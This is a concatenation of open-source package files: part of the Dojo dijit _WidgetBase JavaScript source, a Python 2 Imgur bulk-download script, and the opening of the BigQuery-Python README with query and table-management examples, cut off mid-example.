// Widgets can provide custom setters/getters for widget attributes, which are called automatically by set(name, value).
// For an attribute XXX, define methods _setXXXAttr() and/or _getXXXAttr().
//
// _setXXXAttr can also be a string/hash/array mapping from a widget attribute XXX to the widget's DOMNodes:
//
// - DOM node attribute
// | _setFocusAttr: {node: "focusNode", type: "attribute"}
// | _setFocusAttr: "focusNode" (shorthand)
// | _setFocusAttr: "" (shorthand, maps to this.domNode)
// Maps this.focus to this.focusNode.focus, or (last example) this.domNode.focus
//
// - DOM node innerHTML
// | _setTitleAttr: { node: "titleNode", type: "innerHTML" }
// Maps this.title to this.titleNode.innerHTML
//
// - DOM node innerText
// | _setTitleAttr: { node: "titleNode", type: "innerText" }
// Maps this.title to this.titleNode.innerText
//
// - DOM node CSS class
// | _setMyClassAttr: { node: "domNode", type: "class" }
// Maps this.myClass to this.domNode.className
//
// If the value of _setXXXAttr is an array, then each element in the array matches one of the
// formats of the above list.
//
// If the custom setter is null, no action is performed other than saving the new value
// in the widget (in this).
//
// If no custom setter is defined for an attribute, then it will be copied
// to this.focusNode (if the widget defines a focusNode), or this.domNode otherwise.
// That's only done though for attributes that match DOMNode attributes (title,
// alt, aria-labelledby, etc.)
// id: [const] String
// A unique, opaque ID string that can be assigned by users or by the
// system. If the developer passes an ID which is known not to be
// unique, the specified ID is ignored and the system-generated ID is
// used instead.
id: "",
_setIdAttr: "domNode", // to copy to this.domNode even for auto-generated id's
// lang: [const] String
// Rarely used. Overrides the default Dojo locale used to render this widget,
// as defined by the [HTML LANG](http://www.w3.org/TR/html401/struct/dirlang.html#adef-lang) attribute.
// Value must be among the list of locales specified during by the Dojo bootstrap,
// formatted according to [RFC 3066](http://www.ietf.org/rfc/rfc3066.txt) (like en-us).
lang: "",
// set on domNode even when there's a focus node. but don't set lang="", since that's invalid.
_setLangAttr: nonEmptyAttrToDom("lang"),
// dir: [const] String
// Bi-directional support, as defined by the [HTML DIR](http://www.w3.org/TR/html401/struct/dirlang.html#adef-dir)
// attribute. Either left-to-right "ltr" or right-to-left "rtl". If undefined, widgets renders in page's
// default direction.
dir: "",
// set on domNode even when there's a focus node. but don't set dir="", since that's invalid.
_setDirAttr: nonEmptyAttrToDom("dir"), // to set on domNode even when there's a focus node
// textDir: String
// Bi-directional support, the main variable which is responsible for the direction of the text.
// The text direction can be different than the GUI direction by using this parameter in creation
// of a widget.
// Allowed values:
// 1. "ltr"
// 2. "rtl"
// 3. "auto" - contextual the direction of a text defined by first strong letter.
// By default is as the page direction.
textDir: "",
// class: String
// HTML class attribute
"class": "",
_setClassAttr: { node: "domNode", type: "class" },
// style: String||Object
// HTML style attributes as cssText string or name/value hash
style: "",
// title: String
// HTML title attribute.
//
// For form widgets this specifies a tooltip to display when hovering over
// the widget (just like the native HTML title attribute).
//
// For TitlePane or for when this widget is a child of a TabContainer, AccordionContainer,
// etc., it's used to specify the tab label, accordion pane title, etc.
title: "",
// tooltip: String
// When this widget's title attribute is used to for a tab label, accordion pane title, etc.,
// this specifies the tooltip to appear when the mouse is hovered over that text.
tooltip: "",
// baseClass: [protected] String
// Root CSS class of the widget (ex: dijitTextBox), used to construct CSS classes to indicate
// widget state.
baseClass: "",
// srcNodeRef: [readonly] DomNode
// pointer to original DOM node
srcNodeRef: null,
// domNode: [readonly] DomNode
// This is our visible representation of the widget! Other DOM
// Nodes may by assigned to other properties, usually through the
// template system's data-dojo-attach-point syntax, but the domNode
// property is the canonical "top level" node in widget UI.
domNode: null,
// containerNode: [readonly] DomNode
// Designates where children of the source DOM node will be placed.
// "Children" in this case refers to both DOM nodes and widgets.
// For example, for myWidget:
//
// | <div data-dojo-type=myWidget>
// | <b> here's a plain DOM node
// | <span data-dojo-type=subWidget>and a widget</span>
// | <i> and another plain DOM node </i>
// | </div>
//
// containerNode would point to:
//
// | <b> here's a plain DOM node
// | <span data-dojo-type=subWidget>and a widget</span>
// | <i> and another plain DOM node </i>
//
// In templated widgets, "containerNode" is set via a
// data-dojo-attach-point assignment.
//
// containerNode must be defined for any widget that accepts innerHTML
// (like ContentPane or BorderContainer or even Button), and conversely
// is null for widgets that don't, like TextBox.
containerNode: null,
/*=====
// _started: Boolean
// startup() has completed.
_started: false,
=====*/
// attributeMap: [protected] Object
// Deprecated. Instead of attributeMap, widget should have a _setXXXAttr attribute
// for each XXX attribute to be mapped to the DOM.
//
// attributeMap sets up a "binding" between attributes (aka properties)
// of the widget and the widget's DOM.
// Changes to widget attributes listed in attributeMap will be
// reflected into the DOM.
//
// For example, calling set('title', 'hello')
// on a TitlePane will automatically cause the TitlePane's DOM to update
// with the new title.
//
// attributeMap is a hash where the key is an attribute of the widget,
// and the value reflects a binding to a:
//
// - DOM node attribute
// | focus: {node: "focusNode", type: "attribute"}
// Maps this.focus to this.focusNode.focus
//
// - DOM node innerHTML
// | title: { node: "titleNode", type: "innerHTML" }
// Maps this.title to this.titleNode.innerHTML
//
// - DOM node innerText
// | title: { node: "titleNode", type: "innerText" }
// Maps this.title to this.titleNode.innerText
//
// - DOM node CSS class
// | myClass: { node: "domNode", type: "class" }
// Maps this.myClass to this.domNode.className
//
// If the value is an array, then each element in the array matches one of the
// formats of the above list.
//
// There are also some shorthands for backwards compatibility:
// - string --> { node: string, type: "attribute" }, for example:
// | "focusNode" ---> { node: "focusNode", type: "attribute" }
// - "" --> { node: "domNode", type: "attribute" }
attributeMap: {},
// _blankGif: [protected] String
// Path to a blank 1x1 image.
// Used by <img> nodes in templates that really get their image via CSS background-image.
_blankGif: config.blankGif || require.toUrl("dojo/resources/blank.gif"),
//////////// INITIALIZATION METHODS ///////////////////////////////////////
postscript: function(/*Object?*/params, /*DomNode|String*/srcNodeRef){
// summary:
// Kicks off widget instantiation. See create() for details.
// tags:
// private
this.create(params, srcNodeRef);
},
create: function(/*Object?*/params, /*DomNode|String?*/srcNodeRef){
// summary:
// Kick off the life-cycle of a widget
// params:
// Hash of initialization parameters for widget, including
// scalar values (like title, duration etc.) and functions,
// typically callbacks like onClick.
// srcNodeRef:
// If a srcNodeRef (DOM node) is specified:
// - use srcNodeRef.innerHTML as my contents
// - if this is a behavioral widget then apply behavior
// to that srcNodeRef
// - otherwise, replace srcNodeRef with my generated DOM
// tree
// description:
// Create calls a number of widget methods (postMixInProperties, buildRendering, postCreate,
// etc.), some of which of you'll want to override. See http://dojotoolkit.org/reference-guide/dijit/_WidgetBase.html
// for a discussion of the widget creation lifecycle.
//
// Of course, adventurous developers could override create entirely, but this should
// only be done as a last resort.
// tags:
// private
// store pointer to original DOM tree
this.srcNodeRef = dom.byId(srcNodeRef);
// For garbage collection. An array of listener handles returned by this.connect() / this.subscribe()
this._connects = [];
// For widgets internal to this widget, invisible to calling code
this._supportingWidgets = [];
// this is here for back-compat, remove in 2.0 (but check NodeList-instantiate.html test)
if(this.srcNodeRef && (typeof this.srcNodeRef.id == "string")){ this.id = this.srcNodeRef.id; }
// mix in our passed parameters
if(params){
this.params = params;
lang.mixin(this, params);
}
this.postMixInProperties();
// generate an id for the widget if one wasn't specified
// (be sure to do this before buildRendering() because that function might
// expect the id to be there.)
if(!this.id){
this.id = registry.getUniqueId(this.declaredClass.replace(/\./g,"_"));
}
registry.add(this);
this.buildRendering();
if(this.domNode){
// Copy attributes listed in attributeMap into the [newly created] DOM for the widget.
// Also calls custom setters for all attributes with custom setters.
this._applyAttributes();
// If srcNodeRef was specified, then swap out original srcNode for this widget's DOM tree.
// For 2.0, move this after postCreate(). postCreate() shouldn't depend on the
// widget being attached to the DOM since it isn't when a widget is created programmatically like
// new MyWidget({}). See #11635.
var source = this.srcNodeRef;
if(source && source.parentNode && this.domNode !== source){
source.parentNode.replaceChild(this.domNode, source);
}
}
if(this.domNode){
// Note: for 2.0 may want to rename widgetId to dojo._scopeName + "_widgetId",
// assuming that dojo._scopeName even exists in 2.0
this.domNode.setAttribute("widgetId", this.id);
}
this.postCreate();
// If srcNodeRef has been processed and removed from the DOM (e.g. TemplatedWidget) then delete it to allow GC.
if(this.srcNodeRef && !this.srcNodeRef.parentNode){
delete this.srcNodeRef;
}
this._created = true;
},
_applyAttributes: function(){
// summary:
// Step during widget creation to copy widget attributes to the
// DOM according to attributeMap and _setXXXAttr objects, and also to call
// custom _setXXXAttr() methods.
//
// Skips over blank/false attribute values, unless they were explicitly specified
// as parameters to the widget, since those are the default anyway,
// and setting tabIndex="" is different than not setting tabIndex at all.
//
// For backwards-compatibility reasons attributeMap overrides _setXXXAttr when
// _setXXXAttr is a hash/string/array, but _setXXXAttr as a functions override attributeMap.
// tags:
// private
// Get list of attributes where this.set(name, value) will do something beyond
// setting this[name] = value. Specifically, attributes that have:
// - associated _setXXXAttr() method/hash/string/array
// - entries in attributeMap.
var ctor = this.constructor,
list = ctor._setterAttrs;
if(!list){
list = (ctor._setterAttrs = []);
for(var attr in this.attributeMap){
list.push(attr);
}
var proto = ctor.prototype;
for(var fxName in proto){
if(fxName in this.attributeMap){ continue; }
var setterName = "_set" + fxName.replace(/^[a-z]|-[a-zA-Z]/g, function(c){ return c.charAt(c.length-1).toUpperCase(); }) + "Attr";
if(setterName in proto){
list.push(fxName);
}
}
}
// Call this.set() for each attribute that was either specified as parameter to constructor,
// or was found above and has a default non-null value. For correlated attributes like value and displayedValue, the one
// specified as a parameter should take precedence, so apply attributes in this.params last.
// Particularly important for new DateTextBox({displayedValue: ...}) since DateTextBox's default value is
// NaN and thus is not ignored like a default value of "".
array.forEach(list, function(attr){
if(this.params && attr in this.params){
// skip this one, do it below
}else if(this[attr]){
this.set(attr, this[attr]);
}
}, this);
for(var param in this.params){
this.set(param, this[param]);
}
},
postMixInProperties: function(){
// summary:
// Called after the parameters to the widget have been read-in,
// but before the widget template is instantiated. Especially
// useful to set properties that are referenced in the widget
// template.
// tags:
// protected
},
buildRendering: function(){
// summary:
// Construct the UI for this widget, setting this.domNode.
// Most widgets will mixin `dijit._TemplatedMixin`, which implements this method.
// tags:
// protected
if(!this.domNode){
// Create root node if it wasn't created by _Templated
this.domNode = this.srcNodeRef || domConstruct.create('div');
}
// baseClass is a single class name or occasionally a space-separated list of names.
// Add those classes to the DOMNode. If RTL mode then also add with Rtl suffix.
// TODO: make baseClass custom setter
if(this.baseClass){
var classes = this.baseClass.split(" ");
if(!this.isLeftToRight()){
classes = classes.concat( array.map(classes, function(name){ return name+"Rtl"; }));
}
domClass.add(this.domNode, classes);
}
},
postCreate: function(){
// summary:
// Processing after the DOM fragment is created
// description:
// Called after the DOM fragment has been created, but not necessarily
// added to the document. Do not include any operations which rely on
// node dimensions or placement.
// tags:
// protected
},
startup: function(){
// summary:
// Processing after the DOM fragment is added to the document
// description:
// Called after a widget and its children have been created and added to the page,
// and all related widgets have finished their create() cycle, up through postCreate().
// This is useful for composite widgets that need to control or layout sub-widgets.
// Many layout widgets can use this as a wiring phase.
if(this._started){ return; }
this._started = true;
array.forEach(this.getChildren(), function(obj){
if(!obj._started && !obj._destroyed && lang.isFunction(obj.startup)){
obj.startup();
obj._started = true;
}
});
},
//////////// DESTROY FUNCTIONS ////////////////////////////////
destroyRecursive: function(/*Boolean?*/ preserveDom){
// summary:
// Destroy this widget and its descendants
// description:
// This is the generic "destructor" function that all widget users
// should call to cleanly discard with a widget. Once a widget is
// destroyed, it is removed from the manager object.
// preserveDom:
// If true, this method will leave the original DOM structure
// alone of descendant Widgets. Note: This will NOT work with
// dijit._Templated widgets.
this._beingDestroyed = true;
this.destroyDescendants(preserveDom);
this.destroy(preserveDom);
},
destroy: function(/*Boolean*/ preserveDom){
// summary:
// Destroy this widget, but not its descendants.
// This method will, however, destroy internal widgets such as those used within a template.
// preserveDom: Boolean
// If true, this method will leave the original DOM structure alone.
// Note: This will not yet work with _Templated widgets
this._beingDestroyed = true;
this.uninitialize();
// remove this.connect() and this.subscribe() listeners
var c;
while(c = this._connects.pop()){
c.remove();
}
// destroy widgets created as part of template, etc.
var w;
while(w = this._supportingWidgets.pop()){
if(w.destroyRecursive){
w.destroyRecursive();
}else if(w.destroy){
w.destroy();
}
}
this.destroyRendering(preserveDom);
registry.remove(this.id);
this._destroyed = true;
},
destroyRendering: function(/*Boolean?*/ preserveDom){
// summary:
// Destroys the DOM nodes associated with this widget
// preserveDom:
// If true, this method will leave the original DOM structure alone
// during tear-down. Note: this will not work with _Templated
// widgets yet.
// tags:
// protected
if(this.bgIframe){
this.bgIframe.destroy(preserveDom);
delete this.bgIframe;
}
if(this.domNode){
if(preserveDom){
domAttr.remove(this.domNode, "widgetId");
}else{
domConstruct.destroy(this.domNode);
}
delete this.domNode;
}
if(this.srcNodeRef){
if(!preserveDom){
domConstruct.destroy(this.srcNodeRef);
}
delete this.srcNodeRef;
}
},
destroyDescendants: function(/*Boolean?*/ preserveDom){
// summary:
// Recursively destroy the children of this widget and their
// descendants.
// preserveDom:
// If true, the preserveDom attribute is passed to all descendant
// widget's .destroy() method. Not for use with _Templated
// widgets.
// get all direct descendants and destroy them recursively
array.forEach(this.getChildren(), function(widget){
if(widget.destroyRecursive){
widget.destroyRecursive(preserveDom);
}
});
},
uninitialize: function(){
// summary:
// Stub function. Override to implement custom widget tear-down
// behavior.
// tags:
// protected
return false;
},
////////////////// GET/SET, CUSTOM SETTERS, ETC. ///////////////////
_setStyleAttr: function(/*String||Object*/ value){
// summary:
// Sets the style attribute of the widget according to value,
// which is either a hash like {height: "5px", width: "3px"}
// or a plain string
// description:
// Determines which node to set the style on based on style setting
// in attributeMap.
// tags:
// protected
var mapNode = this.domNode;
// Note: technically we should revert any style setting made in a previous call
// to his method, but that's difficult to keep track of.
if(lang.isObject(value)){
domStyle.set(mapNode, value);
}else{
if(mapNode.style.cssText){
mapNode.style.cssText += "; " + value;
}else{
mapNode.style.cssText = value;
}
}
this._set("style", value);
},
_attrToDom: function(/*String*/ attr, /*String*/ value, /*Object?*/ commands){
// summary:
// Reflect a widget attribute (title, tabIndex, duration etc.) to
// the widget DOM, as specified by commands parameter.
// If commands isn't specified then it's looked up from attributeMap.
// Note some attributes like "type"
// cannot be processed this way as they are not mutable.
//
// tags:
// private
commands = arguments.length >= 3 ? commands : this.attributeMap[attr];
array.forEach(lang.isArray(commands) ? commands : [commands], function(command){
// Get target node and what we are doing to that node
var mapNode = this[command.node || command || "domNode"]; // DOM node
var type = command.type || "attribute"; // class, innerHTML, innerText, or attribute
switch(type){
case "attribute":
if(lang.isFunction(value)){ // functions execute in the context of the widget
value = lang.hitch(this, value);
}
// Get the name of the DOM node attribute; usually it's the same
// as the name of the attribute in the widget (attr), but can be overridden.
// Also maps handler names to lowercase, like onSubmit --> onsubmit
var attrName = command.attribute ? command.attribute :
(/^on[A-Z][a-zA-Z]*$/.test(attr) ? attr.toLowerCase() : attr);
domAttr.set(mapNode, attrName, value);
break;
case "innerText":
mapNode.innerHTML = "";
mapNode.appendChild(win.doc.createTextNode(value));
break;
case "innerHTML":
mapNode.innerHTML = value;
break;
case "class":
domClass.replace(mapNode, value, this[attr]);
break;
}
}, this);
},
get: function(name){
// summary:
// Get a property from a widget.
// name:
// The property to get.
// description:
// Get a named property from a widget. The property may
// potentially be retrieved via a getter method. If no getter is defined, this
// just retrieves the object's property.
//
// For example, if the widget has properties `foo` and `bar`
// and a method named `_getFooAttr()`, calling:
// `myWidget.get("foo")` would be equivalent to calling
// `widget._getFooAttr()` and `myWidget.get("bar")`
// would be equivalent to the expression
// `widget.bar2`
var names = this._getAttrNames(name);
return this[names.g] ? this[names.g]() : this[name];
},
set: function(name, value){
// summary:
// Set a property on a widget
// name:
// The property to set.
// value:
// The value to set in the property.
// description:
// Sets named properties on a widget which may potentially be handled by a
// setter in the widget.
//
// For example, if the widget has properties `foo` and `bar`
// and a method named `_setFooAttr()`, calling
// `myWidget.set("foo", "Howdy!")` would be equivalent to calling
// `widget._setFooAttr("Howdy!")` and `myWidget.set("bar", 3)`
// would be equivalent to the statement `widget.bar = 3;`
//
// set() may also be called with a hash of name/value pairs, ex:
//
// | myWidget.set({
// | foo: "Howdy",
// | bar: 3
// | });
//
// This is equivalent to calling `set(foo, "Howdy")` and `set(bar, 3)`
if(typeof name === "object"){
for(var x in name){
this.set(x, name[x]);
}
return this;
}
var names = this._getAttrNames(name),
setter = this[names.s];
if(lang.isFunction(setter)){
// use the explicit setter
var result = setter.apply(this, Array.prototype.slice.call(arguments, 1));
}else{
// Mapping from widget attribute to DOMNode attribute/value/etc.
// Map according to:
// 1. attributeMap setting, if one exists (TODO: attributeMap deprecated, remove in 2.0)
// 2. _setFooAttr: {...} type attribute in the widget (if one exists)
// 3. apply to focusNode or domNode if standard attribute name, excluding funcs like onClick.
// Checks if an attribute is a "standard attribute" by whether the DOMNode JS object has a similar
// attribute name (ex: accept-charset attribute matches jsObject.acceptCharset).
// Note also that Tree.focusNode() is a function not a DOMNode, so test for that.
var defaultNode = this.focusNode && !lang.isFunction(this.focusNode) ? "focusNode" : "domNode",
tag = this[defaultNode].tagName,
attrsForTag = tagAttrs[tag] || (tagAttrs[tag] = getAttrs(this[defaultNode])),
map = name in this.attributeMap ? this.attributeMap[name] :
names.s in this ? this[names.s] :
((names.l in attrsForTag && typeof value != "function") ||
/^aria-|^data-|^role$/.test(name)) ? defaultNode : null;
if(map != null){
this._attrToDom(name, value, map);
}
this._set(name, value);
}
return result || this;
},
_attrPairNames: {}, // shared between all widgets
_getAttrNames: function(name){
// summary:
// Helper function for get() and set().
// Caches attribute name values so we don't do the string ops every time.
// tags:
// private
var apn = this._attrPairNames;
if(apn[name]){ return apn[name]; }
var uc = name.replace(/^[a-z]|-[a-zA-Z]/g, function(c){ return c.charAt(c.length-1).toUpperCase(); });
return (apn[name] = {
n: name+"Node",
s: "_set"+uc+"Attr", // converts dashes to camel case, ex: accept-charset --> _setAcceptCharsetAttr
g: "_get"+uc+"Attr",
l: uc.toLowerCase() // lowercase name w/out dashes, ex: acceptcharset
});
},
_set: function(/*String*/ name, /*anything*/ value){
// summary:
// Helper function to set new value for specified attribute, and call handlers
// registered with watch() if the value has changed.
var oldValue = this[name];
this[name] = value;
if(this._watchCallbacks && this._created && value !== oldValue){
this._watchCallbacks(name, oldValue, value);
}
},
on: function(/*String*/ type, /*Function*/ func){
// summary:
// Call specified function when event occurs, ex: myWidget.on("click", function(){ ... }).
// description:
// Call specified function when event `type` occurs, ex: `myWidget.on("click", function(){ ... })`.
// Note that the function is not run in any particular scope, so if (for example) you want it to run in the
// widget's scope you must do `myWidget.on("click", lang.hitch(myWidget, func))`.
return aspect.after(this, this._onMap(type), func, true);
},
_onMap: function(/*String*/ type){
// summary:
// Maps on() type parameter (ex: "mousemove") to method name (ex: "onMouseMove")
var ctor = this.constructor, map = ctor._onMap;
if(!map){
map = (ctor._onMap = {});
for(var attr in ctor.prototype){
if(/^on/.test(attr)){
map[attr.replace(/^on/, "").toLowerCase()] = attr;
}
}
}
return map[type.toLowerCase()]; // String
},
toString: function(){
// summary:
// Returns a string that represents the widget
// description:
// When a widget is cast to a string, this method will be used to generate the
// output. Currently, it does not implement any sort of reversible
// serialization.
return '[Widget ' + this.declaredClass + ', ' + (this.id || 'NO ID') + ']'; // String
},
getChildren: function(){
// summary:
// Returns all the widgets contained by this, i.e., all widgets underneath this.containerNode.
// Does not return nested widgets, nor widgets that are part of this widget's template.
return this.containerNode ? registry.findWidgets(this.containerNode) : []; // dijit._Widget[]
},
getParent: function(){
// summary:
// Returns the parent widget of this widget
return registry.getEnclosingWidget(this.domNode.parentNode);
},
connect: function(
/*Object|null*/ obj,
/*String|Function*/ event,
/*String|Function*/ method){
// summary:
// Connects specified obj/event to specified method of this object
// and registers for disconnect() on widget destroy.
// description:
// Provide widget-specific analog to dojo.connect, except with the
// implicit use of this widget as the target object.
// Events connected with `this.connect` are disconnected upon
// destruction.
// returns:
// A handle that can be passed to `disconnect` in order to disconnect before
// the widget is destroyed.
// example:
// | var btn = new dijit.form.Button();
// | // when foo.bar() is called, call the listener we're going to
// | // provide in the scope of btn
// | btn.connect(foo, "bar", function(){
// | console.debug(this.toString());
// | });
// tags:
// protected
var handle = connect.connect(obj, event, this, method);
this._connects.push(handle);
return handle; // _Widget.Handle
},
disconnect: function(handle){
// summary:
// Disconnects handle created by `connect`.
// Also removes handle from this widget's list of connects.
// tags:
// protected
var i = array.indexOf(this._connects, handle);
if(i != -1){
handle.remove();
this._connects.splice(i, 1);
}
},
subscribe: function(t, method){
// summary:
// Subscribes to the specified topic and calls the specified method
// of this object and registers for unsubscribe() on widget destroy.
// description:
// Provide widget-specific analog to dojo.subscribe, except with the
// implicit use of this widget as the target object.
// t: String
// The topic
// method: Function
// The callback
// example:
// | var btn = new dijit.form.Button();
// | // when /my/topic is published, this button changes its label to
// | // be the parameter of the topic.
// | btn.subscribe("/my/topic", function(v){
// | this.set("label", v);
// | });
// tags:
// protected
var handle = topic.subscribe(t, lang.hitch(this, method));
this._connects.push(handle);
return handle; // _Widget.Handle
},
unsubscribe: function(/*Object*/ handle){
// summary:
// Unsubscribes handle created by this.subscribe.
// Also removes handle from this widget's list of subscriptions
// tags:
// protected
this.disconnect(handle);
},
isLeftToRight: function(){
// summary:
// Return this widget's explicit or implicit orientation (true for LTR, false for RTL)
// tags:
// protected
return this.dir ? (this.dir == "ltr") : domGeometry.isBodyLtr(); //Boolean
},
isFocusable: function(){
// summary:
// Return true if this widget can currently be focused
// and false if not
return this.focus && (domStyle.get(this.domNode, "display") != "none");
},
placeAt: function(/* String|DomNode|_Widget */reference, /* String?|Int? */position){
// summary:
// Place this widget's domNode reference somewhere in the DOM based
// on standard domConstruct.place conventions, or passing a Widget reference that
// contains and addChild member.
//
// description:
// A convenience function provided in all _Widgets, providing a simple
// shorthand mechanism to put an existing (or newly created) Widget
// somewhere in the dom, and allow chaining.
//
// reference:
// The String id of a domNode, a domNode reference, or a reference to a Widget possessing
// an addChild method.
//
// position:
// If passed a string or domNode reference, the position argument
// accepts a string just as domConstruct.place does, one of: "first", "last",
// "before", or "after".
//
// If passed a _Widget reference, and that widget reference has an ".addChild" method,
// it will be called passing this widget instance into that method, supplying the optional
// position index passed.
//
// returns:
// dijit._Widget
// Provides a useful return of the newly created dijit._Widget instance so you
// can "chain" this function by instantiating, placing, then saving the return value
// to a variable.
//
// example:
// | // create a Button with no srcNodeRef, and place it in the body:
// | var button = new dijit.form.Button({ label:"click" }).placeAt(win.body());
// | // now, 'button' is still the widget reference to the newly created button
// | button.on("click", function(e){ console.log('click'); }));
//
// example:
// | // create a button out of a node with id="src" and append it to id="wrapper":
// | var button = new dijit.form.Button({},"src").placeAt("wrapper");
//
// example:
// | // place a new button as the first element of some div
// | var button = new dijit.form.Button({ label:"click" }).placeAt("wrapper","first");
//
// example:
// | // create a contentpane and add it to a TabContainer
// | var tc = dijit.byId("myTabs");
// | new dijit.layout.ContentPane({ href:"foo.html", title:"Wow!" }).placeAt(tc)
if(reference.declaredClass && reference.addChild){
reference.addChild(this, position);
}else{
domConstruct.place(this.domNode, reference, position);
}
return this;
},
getTextDir: function(/*String*/ text,/*String*/ originalDir){
// summary:
// Return direction of the text.
// The function overridden in the _BidiSupport module,
// its main purpose is to calculate the direction of the
// text, if was defined by the programmer through textDir.
// tags:
// protected.
return originalDir;
},
applyTextDir: function(/*===== element, text =====*/){
// summary:
// The function overridden in the _BidiSupport module,
// originally used for setting element.dir according to this.textDir.
// In this case does nothing.
// element: DOMNode
// text: String
// tags:
// protected.
}
});
}); | PypiClean |
/DSImgur-1.0.0.2.tar.gz/DSImgur-1.0.0.2/src/DSImgur.py | import sys
import argparse
import re
import urlparse
import json
if sys.version_info[0] == 2:
import urllib
else:
import urllib.request as urllib
# https://github.com/DiSiqueira/DSDownload
from DSDownload import DSDownload
class DSImgur:
profile_link = 'https://{subdomain}.imgur.com/ajax/images?sort=0&order=1&album=0&page={page}&perPage=60'
albums_link = 'https://{subdomain}.imgur.com/'
def __init__(self, workers, folderPath, protocol = 'https://'):
self._urlList = []
self._workers = workers
self._folderPath = folderPath
self.dlList = []
self._protocol = protocol
def addUrl(self, url, folder = ''):
if type(url) is list:
self._urlList += url
else:
self._urlList.append(url)
self._prepareUrlList(folder)
def _findProfileInUrl(self, url, search, delimiter, index):
parts = url.split(delimiter)
if search not in parts:
return False
profile = parts[parts.index(search)+index]
if len(profile)<4:
return False
return self._prepareProfile(profile)
def _prepareUrlList(self, folder):
album = re.compile('(\/)(gallery\/|a\/)(\w{5}?)')
single = re.compile('(\/[a-zA-Z\d]+)(\/)?')
direct = re.compile('(\/[a-zA-Z\d]+)(\.\w{3,4})')
for url in self._urlList:
parse = urlparse.urlparse(url)
#Junk urls
if parse.netloc.find('imgur.com') < 0 :
continue
#https://fallinloveyoulose.imgur.com/*
profile = self._findProfileInUrl(parse.netloc, 'imgur', '.', -1)
if (profile):
continue
#https://imgur.com/user/lukeisskywalking/*
profile = self._findProfileInUrl(url, 'user', '/', 1)
if (profile):
continue
#https://imgur.com/account/fallinloveyoulose/*
profile = self._findProfileInUrl(url, 'account', '/', 1)
if (profile):
continue
#https://imgur.com/a/5xK6z https://imgur.com/gallery/5xK6z
if album.search(parse.path):
self._prepareAlbum(parse.path, folder)
continue
#http://i.imgur.com/BoENDec.jpg
if direct.search(parse.path):
self._prepareDirect(parse.path, folder)
continue
#https://imgur.com/WDn2pnD
if single.search(parse.path):
self._prepareSingle(parse.path, folder)
continue
self._urlList = []
def _getProfileImages(self, subdomain, page):
url = self.profile_link.replace('{subdomain}',subdomain)
url = url.replace('{page}',str(page))
content = urllib.urlopen(url)
try:
result = json.load(content)
except ValueError, e:
return False
if type(result) is not dict:
return False
if result['status'] != 200:
return False
return result
def _getProfileAlbums(self, subdomain):
url = self.albums_link.replace('{subdomain}',subdomain)
content = urllib.urlopen(url)
data = content.read()
content.close()
regex = ur"id=\"album-(.+?)\""
album_list = re.findall(regex, data)
return album_list
def _appendUrl(self, url, folder):
link = {
'url' : url,
'folder': folder
}
self.dlList.append(link)
def _prepareProfile(self, subdomain):
total = 0
page = 0
count = 1
while total < count:
page += 1
total += 60
result = self._getProfileImages(subdomain, page)
if result == False:
return False
count = result['data']['count']
images = result['data']['images']
for image in images:
path = '/'+image['hash']+image['ext']
self._prepareDirect(path,subdomain)
album_list = self._getProfileAlbums(subdomain)
if result == False:
return False
for album in album_list:
self._prepareAlbum('/a/' + album,subdomain)
return True
def _prepareAlbum(self, path, folder):
if not path.endswith('/'):
path += '/'
path += 'zip'
path = path.replace("/gallery/", "/a/")
url = self._protocol+'imgur.com'+path
self._appendUrl(url,folder)
return url
def _prepareDirect(self, path, folder):
url = self._protocol+'i.imgur.com'+path
self._appendUrl(url,folder)
return url
def _prepareSingle(self, path, folder):
if path.endswith('/'):
path = path[:-1]
url = self._protocol+'i.imgur.com'+path+'.jpg'
self._appendUrl(url,folder)
return url
def download(self):
if len(self.dlList) <= 0:
return False
DSDownload(self.dlList, self._workers, self._folderPath)
self.dlList = []
return True | PypiClean |
/BigQuery-Python-1.15.0.tar.gz/BigQuery-Python-1.15.0/README.md | BigQuery-Python
===============
<a href="https://travis-ci.org/tylertreat/BigQuery-Python"><img align="right" src="https://travis-ci.org/tylertreat/BigQuery-Python.svg"></a>
Simple Python client for interacting with Google BigQuery.
This client provides an API for retrieving and inserting BigQuery data by wrapping Google's low-level API client library. It also provides facilities that make it convenient to access data that is tied to an App Engine appspot, such as request logs.
[Documentation](http://tylertreat.github.io/BigQuery-Python/)
# Installation
`pip install bigquery-python`
# Basic Usage
```python
from bigquery import get_client
# BigQuery project id as listed in the Google Developers Console.
project_id = 'project_id'
# Service account email address as listed in the Google Developers Console.
service_account = 'my_id_123@developer.gserviceaccount.com'
# PKCS12 or PEM key provided by Google.
key = 'key.pem'
client = get_client(project_id, service_account=service_account,
private_key_file=key, readonly=True)
# JSON key provided by Google
json_key = 'key.json'
client = get_client(json_key_file=json_key, readonly=True)
# Submit an async query.
job_id, _results = client.query('SELECT * FROM dataset.my_table LIMIT 1000')
# Check if the query has finished running.
complete, row_count = client.check_job(job_id)
# Retrieve the results.
results = client.get_query_rows(job_id)
```
# Executing Queries
The BigQuery client allows you to execute raw queries against a dataset. The `query` method inserts a query job into BigQuery. By default, `query` method runs asynchronously with `0` for `timeout`. When a non-zero timeout value is specified, the job will wait for the results, and throws an exception on timeout.
When you run an async query, you can use the returned `job_id` to poll for job status later with `check_job`.
```python
# Submit an async query
job_id, _results = client.query('SELECT * FROM dataset.my_table LIMIT 1000')
# Do other stuffs
# Poll for query completion.
complete, row_count = client.check_job(job_id)
# Retrieve the results.
if complete:
results = client.get_query_rows(job_id)
```
You can also specify a non-zero timeout value if you want your query to be synchronous.
```python
# Submit a synchronous query
try:
_job_id, results = client.query('SELECT * FROM dataset.my_table LIMIT 1000', timeout=10)
except BigQueryTimeoutException:
print "Timeout"
```
## Query Builder
The `query_builder` module provides an API for generating query strings that can be run using the BigQuery client.
```python
from bigquery.query_builder import render_query
selects = {
'start_time': {
'alias': 'Timestamp',
'format': 'INTEGER-FORMAT_UTC_USEC'
}
}
conditions = [
{
'field': 'Timestamp',
'type': 'INTEGER',
'comparators': [
{
'condition': '>=',
'negate': False,
'value': 1399478981
}
]
}
]
grouping = ['Timestamp']
having = [
{
'field': 'Timestamp',
'type': 'INTEGER',
'comparators': [
{
'condition': '==',
'negate': False,
'value': 1399478981
}
]
}
]
order_by ={'fields': ['Timestamp'], 'direction': 'desc'}
query = render_query(
'dataset',
['table'],
select=selects,
conditions=conditions,
groupings=grouping,
having=having,
order_by=order_by,
limit=47
)
job_id, _ = client.query(query)
```
# Managing Tables
The BigQuery client provides facilities to manage dataset tables, including creating, deleting, checking the existence, and getting the metadata of tables.
```python
# Create a new table.
schema = [
{'name': 'foo', 'type': 'STRING', 'mode': 'nullable'},
